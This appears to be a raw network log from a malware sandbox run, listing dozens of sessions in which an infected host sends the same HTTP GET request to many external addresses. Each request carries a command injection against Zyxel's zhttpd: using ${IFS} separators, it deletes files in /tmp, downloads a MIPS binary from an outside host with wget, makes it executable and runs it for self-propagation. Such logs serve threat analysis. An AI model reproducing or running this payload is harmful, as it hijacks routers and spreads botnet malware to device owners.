                                          Jan 14, 2024 15:46:11.891393900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3386192.168.2.235789034.150.174.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.891405106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3387192.168.2.2337642189.219.175.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.891428947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3388192.168.2.2343622153.242.169.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.891458988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3389192.168.2.235237267.132.182.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.891496897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3390192.168.2.2352492166.207.121.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.891529083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3391192.168.2.234041893.21.147.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.907131910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3392192.168.2.2337168161.25.221.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.907167912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3393192.168.2.234141665.39.135.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.907203913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3394192.168.2.2353646196.23.170.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.907243013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3395192.168.2.2359604129.144.91.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.907277107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3396192.168.2.23441469.40.56.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.907326937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3397192.168.2.2357628191.143.217.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.907365084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3398192.168.2.2356380154.48.182.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.907402992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3399192.168.2.2351348221.35.124.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.907469034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3400192.168.2.233792037.219.110.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.907505989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3401192.168.2.234882012.39.114.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.907522917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3402192.168.2.2345128174.23.180.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.907576084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3403192.168.2.235701687.139.134.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.907622099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3404192.168.2.2339612160.44.54.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.907684088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3405192.168.2.2356938161.14.229.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.907706022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3406192.168.2.234822250.5.32.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.907754898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3407192.168.2.235475435.246.177.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.907809973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3408192.168.2.2343898182.112.192.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.907829046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3409192.168.2.2344284101.76.74.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.907888889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3410192.168.2.2338178175.166.133.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.907926083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3411192.168.2.2339670128.76.80.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.907973051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3412192.168.2.23334289.208.255.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.907995939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3413192.168.2.234009292.191.29.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908062935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3414192.168.2.235839817.254.192.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908066988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3415192.168.2.234109852.98.183.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908133984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3416192.168.2.2353548207.255.18.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908164978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3417192.168.2.2334106212.78.239.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908191919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3418192.168.2.2351896150.200.70.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908232927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3419192.168.2.2347618189.39.249.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908274889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3420192.168.2.235379262.93.37.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908312082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3421192.168.2.2356412129.168.158.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908345938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3422192.168.2.233350434.108.130.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908376932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3423192.168.2.2349730101.45.156.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908438921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3424192.168.2.234164627.10.160.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908468962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3425192.168.2.2349322174.185.48.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908515930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3426192.168.2.2347320170.126.81.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908545971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3427192.168.2.2359852157.189.225.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908606052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3428192.168.2.2360538210.102.12.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908628941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3429192.168.2.2334286100.24.71.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908684015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3430192.168.2.233716218.131.16.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908731937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3431192.168.2.234577469.209.167.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908770084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3432192.168.2.2345924182.133.216.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908832073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3433192.168.2.23396065.86.231.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908869982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3434192.168.2.2353932113.43.251.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908900976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3435192.168.2.2345676125.63.187.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908937931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3436192.168.2.233787489.196.226.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.908984900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3437192.168.2.235150884.126.107.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909015894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3438192.168.2.233567296.34.193.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909075022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3439192.168.2.235769031.0.84.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909142971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3440192.168.2.235697637.152.20.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909178019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3441192.168.2.2350456191.161.81.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909188986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3442192.168.2.234028048.177.243.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909241915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3443192.168.2.2343386125.130.91.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909256935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3444192.168.2.235368043.38.82.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909296989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3445192.168.2.23411562.58.117.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909326077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3446192.168.2.233554489.185.221.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909418106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3447192.168.2.2360250204.173.51.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909437895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3448192.168.2.233703643.42.193.96443
                                          TimestampBytes transferredDirectionData
